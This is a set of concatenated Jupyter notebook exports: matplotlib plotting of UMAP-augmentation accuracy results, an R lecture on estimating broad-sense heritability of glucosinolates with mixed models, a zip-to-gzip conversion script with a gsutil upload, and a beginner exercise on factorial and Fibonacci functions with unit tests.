subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
{
"mask": results_df.augmented == 'umap_intersection',
"color": pal[8],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (intersection)"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_augmented_learned',
"color": pal[4],
"ls": 'dashed',
"marker": 'X',
"label": "+Aug + UMAP (learned)"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
ymin, ymax = ax.get_ylim()
ymax = 1
ax.set_ylim([ymin, ymax])
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_augmented_learned',
"color": pal[4],
"ls": 'dashed',
"marker": 'X',
"label": "+Aug + UMAP (learned)"
},
#{
# "mask": results_df.augmented == 'umap_learned',
# "color": pal[4],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (learned)"
#},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
#{
# "mask": results_df.augmented == 'umap_euclidean',
# "color": pal[0],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (Euclidean)"
#},
{
"mask": results_df.augmented == 'umap_euclidean_augmented',
"color": pal[0],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug. + UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
{
"mask": results_df.augmented == 'umap_euclidean_augmented',
"color": pal[0],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug. + UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_over_z',
"color": pal[8],
"ls": 'dashed',
"marker": 'X',
"label": "UMAP (learned z)"
},
#{
# "mask": results_df.augmented == 'umap_learned',
# "color": pal[4],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (learned)"
#},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
###Output
_____no_output_____ |
gwas-lecture-master/Lecture-6-BroadSenseHeritability.ipynb | ###Markdown
Estimating broad-sense Heritability ($H^{2}$) Heritability is the proportion of phenotypic variance that can be attributed to genetic differences among individuals. It is defined as the ratio of genetic to total phenotypic variation in a population: Phenotype (P) = Genotype (G) + Environment (E). The genetic component of phenotypic variance can be separated into additive, dominance, and interaction (G x G) effects. Each of these components of variance contributes to broad-sense heritability:\begin{equation*}H^{2} = \frac{VG}{VP} \end{equation*} or \begin{equation*}H^{2} = \frac{Va + Vd + Vi}{VP} \end{equation*} There are several ways to estimate broad-sense heritability. For those of us that work on inbred lines, we can model the variance due to genetics and the environment using a mixed-effects model, while including the accession-id (also known as the genotype or ecotype in some fields of research) as a random effect. We can then use a trick described in [this paper](https://besjournals.onlinelibrary.wiley.com/doi/10.1111/j.2041-210x.2012.00261.x) and implemented in code described [here](https://jonlefcheck.net/2013/03/13/r2-for-linear-mixed-effects-models/). *** Load the data To investigate broad-sense heritability, let's use [publicly available](http://www.pnas.org/content/112/13/4032) glucosinolate data. The formatted data can be downloaded here: curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/bmeyer_etal.txt --create-dirs --output data/cmeyer_glucs2015/bmeyer_etal.txt This is the R-script for estimating marginal and conditional variance in a mixed-model (merMod): curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R --create-dirs --output data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R
###Code
## if lme4 isn't installed, install it first:
if (!require("lme4")) install.packages("lme4");
library(lme4);
source("data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R");
glucosinolateFileName <- "data/cmeyer_glucs2015/bmeyer_etal.txt";
glucs <- read.table(glucosinolateFileName, header=T, sep="\t", as.is=T, stringsAsFactors=FALSE);
glucs <- glucs[order(glucs[,"accession_id"]),];
dim(glucs);
head(glucs);
str(glucs);
## note that accession_id isn't a factor yet...
## it is numeric, so it is important to be explicit...
glucs$accession_id <- as.factor(glucs$accession_id);
## adjust the ion counts by sample weight
for( j in 3:ncol(glucs)){
glucosinolateVariableName <- colnames(glucs)[j];
glucs[[paste0(glucosinolateVariableName, "_per_mg")]] <- glucs[,glucosinolateVariableName] / glucs[,"sample_weight"]; ## in mg
}
## there are 22 glucosinolate phenotypes, let's look at their distributions
options(repr.plot.width=5, repr.plot.height=4)
scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))];
for( col_j in scaledGlucosinolates ){
scaledGluc_j <- glucs[,col_j];
hist(scaledGluc_j, breaks=100, col="cadetblue3", main=col_j, xlab=paste0("Ion counts, ", col_j));
}
###Output
_____no_output_____
###Markdown
There's a surprising amount of zero-inflation in the data. To analyze data such as these, one can choose between (a) a zero-inflated model, (b) logistic regression (focusing on presence/absence of each metabolite), (c) attempting to standardize the data and analyze it using traditional linear approaches (not recommended but the most common approach; linear models are very robust), (d) analyzing the data as presence/absence data and, separately, abundance data before combining the results using Brown's _P_ value or a weighted Z-score approach. Let's use linear models to investigate the data, which is what the authors did
###Code
results <- data.frame(method=character(), glucosinolate_name=character(), H2=numeric(), pvalue=numeric(), stringsAsFactors=FALSE);
scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))]; print(scaledGlucosinolates);
for( col_j in scaledGlucosinolates ){
cat("Investigating:", col_j, "\n");
log_of_y <- log(glucs[,col_j] + 0.01); ## add an offset to avoid 0s which return -Inf
lm.null <- lm(log_of_y ~ 1, data=glucs);
lmer.alt <- lmer(log_of_y ~ 1 + (1|accession_id), data=glucs, REML=FALSE);
results[nrow(results) + 1, "method"] <- "linear";
results[nrow(results), "glucosinolate_name"] <- col_j;
ourEstimate <- r.squared.merMod(lmer.alt);
results[nrow(results), "H2"] <- ourEstimate['Conditional'] - ourEstimate['Marginal'];
## note that the mixed model has to be specified first
## if sigma is on the boundary, this approach is conservative; consider exactLRT which estimates the p-value using simulations.
## source: https://bbolker.github.io/mixedmodels-misc/glmmFAQ.html
results[nrow(results), "pvalue"] <- anova(lmer.alt, lm.null)[2, "Pr(>Chisq)"];
}
results;
title <- paste0("Heritability of glucosinolates");
hist(results[,"H2"], breaks=25, col="red", main=title, xlab=expression(paste("H"^"2")))
###Output
_____no_output_____ |
Changing_compression.ipynb | ###Markdown
Importing Libraries
###Code
from zipfile import ZipFile
import os
import re
import gzip
###Output
_____no_output_____
###Markdown
finding files with zip extensions in './data/' directory
###Code
data_folder = "./data/"
# Loading the list of files in the './data/' directory
pattern = r'(.*)\.zip'
files_n = [[par_n+"/",re.match(pattern, file)[1]] for par_n, dir_n, file_n in os.walk(data_folder)
for file in file_n if re.match(pattern, file)!=None]
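# files_n now holds [parent_dir + "/", archive_name_without_extension] pairs,
# e.g. [['./data/2020/', 'sensor_dump']] (illustrative names only).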
# Changing the compression to gzip
for path, file in files_n:
# Extracting the zip file
with ZipFile(path+file+'.zip', 'r') as zipf:
zipf.extractall(path)
# Compressing the extracted text file using gzip compression
with open(path+file+'.txt', 'rb') as f_in, gzip.open(path+file+'.txt.gz', 'wb') as f_out:
f_out.writelines(f_in)
# Removing the extracted text file
os.remove(path+file+'.txt')
###Output
_____no_output_____
###Markdown
Uploading gzipped files
###Code
# For uploading the gzipped files, run the following in command line
# (assuming all the gzip files are directly inside ./data/ directory on your local machine)
!gsutil -m cp -r ./data/*.gz gs://my-bucket/directory
###Output
_____no_output_____ |
unit1/fibonacci.ipynb | ###Markdown
Task: create a function that returns the first n factorials fact(4) [1, 1, 2, 6, 24] i.e. [0!, 1!, 2!, 3!, 4!]
###Code
import unittest
class TestFact(unittest.TestCase):
"""test factorial functions"""
def test1(self):
self.assertEqual(fact(0), [1])
self.assertEqual(fact(1), [1, 1])
self.assertEqual(fact(2), [1, 1, 2])
self.assertEqual(fact(3), [1, 1, 2, 6])
self.assertEqual(fact(5), [1, 1, 2, 6, 24, 120])
def fact(n):
res = []
return res
a=[4,8,9,0]
a[2]
res = [1]
n = 7
for i in range(1, n):
t = i*res[i-1]
res.append(t)
res
def fact(n):
res = [1]
    for i in range(1, n + 1):
t = i*res[i-1]
res.append(t)
return res
fact(5)
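# Sanity check against TestFact's expectations:
assert fact(0) == [1]
assert fact(5) == [1, 1, 2, 6, 24, 120]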
###Output
_____no_output_____
###Markdown
Task: create a function that returns the first n terms of the Fibonacci sequence fib(7) [0, 1, 1, 2, 3, 5, 8, 13]
###Code
def fib(n):
res = [0, 1]
return res
import unittest
class TestFib(unittest.TestCase):
"""test factorial functions"""
def test1(self):
self.assertEqual(fib(2), [0, 1])
self.assertEqual(fib(4), [0, 1, 1, 2])
self.assertEqual(fib(8), [0, 1, 1, 2, 3, 5, 8, 13])
if __name__ == '__main__':
unittest.main(argv=['first-arg-is-ignored'], exit=False)
res = [0,1]
n = 7
for i in range(1, n):
# t = res[i-1]
t = res[i]+res[i-1]
res.append(t)
res
def fib(n):
res = [0,1]
for i in range(1, n -1):
t = res[i]+res[i-1]
res.append(t)
return res
fib(10)
t = 1
i = 1
n = 13
while i <= n:
t = i*t
# print(i,t)
i = i+1
def fact2(n):
i = 1
t = 1
while i <= n:
t = i*t
# print(i,t)
i = i+1
return t
fact2(15)
assert fact2(1) == 1
assert fact2(2) == 2
assert fact2(3) == 6
n = int(input("number"))
fact2(n)
def fact_user():
s = input("number?")
n = int(s)
res = fact2(n)
return res
fact_user()
t = 1
i = 1
while t <= 1e9:
t = i*t
print(i,t)
i = i+1
ss = " AAABBBBCCCCCC"
len(ss)
"E" in ss
ss.count("S")
fact2(len(ss))/(fact2(ss.count("A")) * fact2(ss.count("B")) * fact2(ss.count("C")))
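# The line above computes the multinomial coefficient 14!/(3!*4!*6!), i.e. the number of
# distinct rearrangements of the characters in ss (the single leading space adds 1! = 1).
# Cross-check with the standard library:
from math import factorial
from collections import Counter
coef = factorial(len(ss))
for c in Counter(ss).values():
    coef //= factorial(c)
coef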
###Output
_____no_output_____ |
labml_nn/hypernetworks/experiment.ipynb | ###Markdown
